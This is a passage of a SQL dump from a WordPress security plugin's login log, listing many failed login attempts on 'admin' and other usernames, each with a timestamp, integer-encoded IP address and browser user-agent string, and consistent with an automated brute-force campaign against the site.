(101660, 1497955205.752027, 1, 'loginFailInvalidUsername', 'amministratore', 0, 1466596995, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0'),
(101659, 1497955205.435969, 1, 'loginFailInvalidUsername', 'amministratore', 0, 1466596995, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0'),
(101658, 1497955205.127477, 1, 'loginFailInvalidUsername', 'amministratore', 0, 1466596995, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0'),
(101657, 1497955204.821596, 1, 'loginFailInvalidUsername', 'amministratore', 0, 1466596995, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0'),
(101656, 1497955204.516860, 1, 'loginFailInvalidUsername', 'amministratore', 0, 1466596995, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0'),
(101655, 1497955204.211527, 1, 'loginFailInvalidUsername', 'amministratore', 0, 1466596995, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0'),
(101654, 1497955203.904389, 1, 'loginFailInvalidUsername', 'amministratore', 0, 1466596995, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0'),
(101653, 1497955203.593149, 1, 'loginFailInvalidUsername', 'amministratore', 0, 1466596995, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0'),
(101652, 1497955203.288163, 1, 'loginFailInvalidUsername', 'amministratore', 0, 1466596995, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0'),
(101651, 1497955202.980402, 1, 'loginFailInvalidUsername', 'amministratore', 0, 1466596995, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0'),
(101650, 1497955202.671709, 1, 'loginFailInvalidUsername', 'amministratore', 0, 1466596995, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0'),
(101649, 1497955202.361781, 1, 'loginFailInvalidUsername', 'amministratore', 0, 1466596995, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0'),
(101648, 1497955202.052697, 1, 'loginFailInvalidUsername', 'amministratore', 0, 1466596995, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0'),
(101647, 1497955201.741498, 1, 'loginFailInvalidUsername', 'amministratore', 0, 1466596995, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0'),
(101646, 1497955201.433845, 1, 'loginFailInvalidUsername', 'amministratore', 0, 1466596995, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0'),
(101645, 1497955201.127068, 1, 'loginFailInvalidUsername', 'amministratore', 0, 1466596995, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0'),
(101644, 1497955200.801309, 1, 'loginFailInvalidUsername', 'amministratore', 0, 1466596995, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0'),
(101643, 1497949054.958646, 1, 'loginFailValidUsername', 'admin', 1, 824377414, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101642, 1497949053.427037, 1, 'loginFailValidUsername', 'admin', 1, 824377414, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101641, 1497948946.091042, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101640, 1497948391.592217, 1, 'loginFailValidUsername', 'admin', 1, 456859894, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101639, 1497948390.129584, 1, 'loginFailValidUsername', 'admin', 1, 456859894, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101638, 1497944722.215923, 1, 'loginFailValidUsername', 'admin', 1, 1892921625, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101637, 1497941988.256931, 1, 'loginFailValidUsername', 'admin', 1, 2733940970, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101636, 1497941986.859478, 1, 'loginFailValidUsername', 'admin', 1, 2733940970, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101635, 1497941478.298102, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101634, 1497940682.356521, 1, 'loginFailValidUsername', 'admin', 1, 3185066879, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101633, 1497940681.039044, 1, 'loginFailValidUsername', 'admin', 1, 3185066879, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101632, 1497939979.060337, 1, 'loginFailValidUsername', 'admin', 1, 623782850, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101631, 1497939977.726518, 1, 'loginFailValidUsername', 'admin', 1, 623782850, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101630, 1497934846.345095, 1, 'loginFailValidUsername', 'admin', 1, 2576789288, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101629, 1497934844.621558, 1, 'loginFailValidUsername', 'admin', 1, 2576789288, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101628, 1497934557.279718, 1, 'loginFailValidUsername', 'admin', 1, 3411518045, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101627, 1497934555.376557, 1, 'loginFailValidUsername', 'admin', 1, 3411518045, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101626, 1497934102.292808, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101625, 1497932238.711257, 1, 'loginFailValidUsername', 'admin', 1, 1851650026, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101624, 1497932237.267951, 1, 'loginFailValidUsername', 'admin', 1, 1851650026, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101623, 1497927346.858767, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101622, 1497926129.637171, 1, 'loginFailValidUsername', 'admin', 1, 1733567786, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101621, 1497925775.711731, 1, 'loginFailValidUsername', 'admin', 1, 2982565155, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101620, 1497925567.579673, 1, 'loginFailValidUsername', 'admin', 1, 3207991142, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101619, 1497924894.199151, 1, 'loginFailValidUsername', 'admin', 1, 3188734267, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101618, 1497924892.521833, 1, 'loginFailValidUsername', 'admin', 1, 3188734267, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101617, 1497924132.896087, 1, 'loginFailValidUsername', 'admin', 1, 3132336926, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101616, 1497924131.041494, 1, 'loginFailValidUsername', 'admin', 1, 3132336926, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101615, 1497921904.657259, 1, 'loginFailValidUsername', 'admin', 1, 3206613788, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101614, 1497921903.033998, 1, 'loginFailValidUsername', 'admin', 1, 3206613788, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101613, 1497920410.292719, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101612, 1497919538.486161, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1539837019, 'Mozilla/5.0 (Windows NT 5.0; rv:52.59.06) Gecko/20147688 Firefox/52.59.06'),
(101611, 1497918637.930056, 1, 'loginFailValidUsername', 'admin', 1, 2946425103, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101610, 1497918262.947451, 1, 'loginFailValidUsername', 'admin', 1, 1442664703, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101609, 1497915130.773160, 1, 'loginFailValidUsername', 'admin', 1, 1378444814, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101608, 1497915129.765064, 1, 'loginFailValidUsername', 'admin', 1, 1378444814, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101607, 1497914651.818608, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101606, 1497914109.219188, 1, 'loginFailValidUsername', 'admin', 1, 3036335114, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101605, 1497914107.498086, 1, 'loginFailValidUsername', 'admin', 1, 3036335114, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101604, 1497909038.767959, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101603, 1497906915.361471, 1, 'loginFailValidUsername', 'admin', 1, 2172307143, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101602, 1497906912.902274, 1, 'loginFailValidUsername', 'admin', 1, 2172307143, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101601, 1497904286.637883, 1, 'loginFailValidUsername', 'admin', 1, 657710900, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101600, 1497904275.014534, 1, 'loginFailValidUsername', 'admin', 1, 657710900, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101599, 1497903452.907161, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101598, 1497900878.343282, 1, 'loginFailValidUsername', 'admin', 1, 3302842753, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101597, 1497900869.967022, 1, 'loginFailValidUsername', 'admin', 1, 3302842753, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101596, 1497899152.728534, 1, 'loginFailValidUsername', 'admin', 1, 1082719650, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101595, 1497899151.575606, 1, 'loginFailValidUsername', 'admin', 1, 1082719650, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101594, 1497898058.335024, 1, 'loginFailValidUsername', 'admin', 1, 2969046206, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101593, 1497898057.375828, 1, 'loginFailValidUsername', 'admin', 1, 2969046206, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101592, 1497897924.393857, 1, 'loginFailValidUsername', 'admin', 1, 3523560779, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101591, 1497897922.841072, 1, 'loginFailValidUsername', 'admin', 1, 3523560779, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101590, 1497897647.669914, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101589, 1497897223.824803, 1, 'loginFailValidUsername', 'admin', 1, 1451215676, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101588, 1497895651.629394, 1, 'loginFailValidUsername', 'admin', 1, 2959119668, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101587, 1497895650.638165, 1, 'loginFailValidUsername', 'admin', 1, 2959119668, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101586, 1497893796.717329, 1, 'loginFailValidUsername', 'admin', 1, 3134715766, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101585, 1497893795.329684, 1, 'loginFailValidUsername', 'admin', 1, 3134715766, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101584, 1497892612.438210, 1, 'loginFailValidUsername', 'admin', 1, 1539837019, 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_58_00) AppleWebKit/534.06.69 (KHTML, like Gecko) Chrome/53.6.1894.7166 Safari/530.77 Edge/34.73456'),
(101583, 1497892071.013639, 1, 'loginFailValidUsername', 'admin', 1, 3374681884, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101582, 1497892068.731566, 1, 'loginFailValidUsername', 'admin', 1, 3374681884, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101581, 1497892060.014749, 1, 'loginFailValidUsername', 'admin', 1, 2536057826, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101580, 1497892058.960403, 1, 'loginFailValidUsername', 'admin', 1, 2536057826, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101579, 1497891320.461162, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101578, 1497890300.364106, 1, 'loginFailValidUsername', 'admin', 1, 1332056195, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101577, 1497888974.366263, 1, 'loginFailValidUsername', 'admin', 1, 1546189087, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101576, 1497888973.310523, 1, 'loginFailValidUsername', 'admin', 1, 1546189087, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101575, 1497886873.693566, 1, 'loginFailValidUsername', 'admin', 1, 1547655939, 'Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0'),
(101574, 1497885149.391001, 1, 'loginFailValidUsername', 'admin', 1, 3184579739, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101573, 1497885148.189889, 1, 'loginFailValidUsername', 'admin', 1, 3184579739, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101572, 1497883496.565198, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101571, 1497878659.023638, 1, 'loginFailValidUsername', 'admin', 1, 702767257, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101570, 1497878657.866059, 1, 'loginFailValidUsername', 'admin', 1, 702767257, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101569, 1497875007.134157, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101568, 1497874937.376640, 1, 'loginFailValidUsername', 'admin', 1, 3124507901, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101567, 1497873221.733387, 1, 'loginFailValidUsername', 'admin', 1, 2087222324, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1');
INSERT INTO `wp_wfLogins` (`id`, `ctime`, `fail`, `action`, `username`, `userID`, `IP`, `UA`) VALUES
(101566, 1497873220.072275, 1, 'loginFailValidUsername', 'admin', 1, 2087222324, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101565, 1497872316.290601, 1, 'loginFailValidUsername', 'admin', 1, 3400735281, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101564, 1497872315.035908, 1, 'loginFailValidUsername', 'admin', 1, 3400735281, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101563, 1497871252.049081, 1, 'loginFailValidUsername', 'admin', 1, 1598837055, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101562, 1497871250.992216, 1, 'loginFailValidUsername', 'admin', 1, 1598837055, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101561, 1497870468.439081, 1, 'loginFailValidUsername', 'admin', 1, 1730750354, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101560, 1497870467.086511, 1, 'loginFailValidUsername', 'admin', 1, 1730750354, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101559, 1497867333.139238, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101558, 1497863766.914280, 1, 'loginFailValidUsername', 'admin', 1, 832027457, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101557, 1497863765.330435, 1, 'loginFailValidUsername', 'admin', 1, 832027457, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101556, 1497863503.011135, 1, 'loginFailValidUsername', 'admin', 1, 1133349610, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101555, 1497863499.718753, 1, 'loginFailValidUsername', 'admin', 1, 1133349610, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101554, 1497862850.279874, 1, 'loginFailValidUsername', 'admin', 1, 657191032, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101553, 1497862848.078248, 1, 'loginFailValidUsername', 'admin', 1, 657191032, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101552, 1497862232.524739, 1, 'loginFailValidUsername', 'admin', 1, 1768588169, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101551, 1497862231.278049, 1, 'loginFailValidUsername', 'admin', 1, 1768588169, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101550, 1497860855.481398, 1, 'loginFailValidUsername', 'admin', 1, 1800251650, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101549, 1497860853.359739, 1, 'loginFailValidUsername', 'admin', 1, 1800251650, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101548, 1497860565.172845, 1, 'loginFailValidUsername', 'admin', 1, 1330590301, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101547, 1497860564.083855, 1, 'loginFailValidUsername', 'admin', 1, 1330590301, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101546, 1497855076.137590, 1, 'loginFailValidUsername', 'admin', 1, 1976268809, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101545, 1497855074.468349, 1, 'loginFailValidUsername', 'admin', 1, 1976268809, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101544, 1497853662.954699, 1, 'loginFailValidUsername', 'admin', 1, 1301920624, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101543, 1497853661.919966, 1, 'loginFailValidUsername', 'admin', 1, 1301920624, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101542, 1497852201.290922, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101541, 1497851289.517297, 1, 'loginFailValidUsername', 'admin', 1, 3414166908, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101540, 1497851288.355051, 1, 'loginFailValidUsername', 'admin', 1, 3414166908, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101539, 1497851093.503823, 1, 'loginFailValidUsername', 'admin', 1, 2970345110, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101538, 1497848749.227761, 1, 'loginFailValidUsername', 'admin', 1, 1732021588, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101537, 1497848747.653203, 1, 'loginFailValidUsername', 'admin', 1, 1732021588, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101536, 1497848343.955567, 1, 'loginFailValidUsername', 'admin', 1, 827164163, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101535, 1497848342.552092, 1, 'loginFailValidUsername', 'admin', 1, 827164163, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101533, 1497846596.383892, 1, 'loginFailValidUsername', 'admin', 1, 1539837014, ''),
(101534, 1497846596.474711, 1, 'loginFailValidUsername', 'admin', 1, 1539837014, ''),
(101532, 1497846558.968506, 1, 'loginFailValidUsername', 'admin', 1, 1675930294, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101531, 1497845621.639627, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3147914882, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101530, 1497845620.443946, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3147914882, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101529, 1497845267.783811, 1, 'loginFailValidUsername', 'admin', 1, 2970227750, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101528, 1497845266.413367, 1, 'loginFailValidUsername', 'admin', 1, 2970227750, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101527, 1497845227.091679, 1, 'loginFailValidUsername', 'admin', 1, 19492457, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101526, 1497845225.362301, 1, 'loginFailValidUsername', 'admin', 1, 19492457, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101525, 1497845015.523887, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101524, 1497843396.162174, 1, 'loginFailValidUsername', 'admin', 1, 3141660694, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101523, 1497843394.654263, 1, 'loginFailValidUsername', 'admin', 1, 3141660694, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101522, 1497841063.930601, 1, 'loginFailValidUsername', 'admin', 1, 697041447, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101521, 1497841062.855561, 1, 'loginFailValidUsername', 'admin', 1, 697041447, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101520, 1497839950.928141, 1, 'loginFailValidUsername', 'admin', 1, 1333115656, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101519, 1497839949.808188, 1, 'loginFailValidUsername', 'admin', 1, 1333115656, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101518, 1497839343.853402, 1, 'loginFailValidUsername', 'admin', 1, 461624629, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101517, 1497839342.432205, 1, 'loginFailValidUsername', 'admin', 1, 461624629, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101516, 1497837904.487553, 1, 'loginFailValidUsername', 'admin', 1, 3216807797, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101515, 1497837902.912663, 1, 'loginFailValidUsername', 'admin', 1, 3216807797, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101514, 1497837736.879725, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101513, 1497837207.891080, 1, 'loginFailValidUsername', 'admin', 1, 2946418994, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101512, 1497835043.120551, 1, 'loginFailValidUsername', 'admin', 1, 2971786226, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101511, 1497835041.591195, 1, 'loginFailValidUsername', 'admin', 1, 2971786226, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
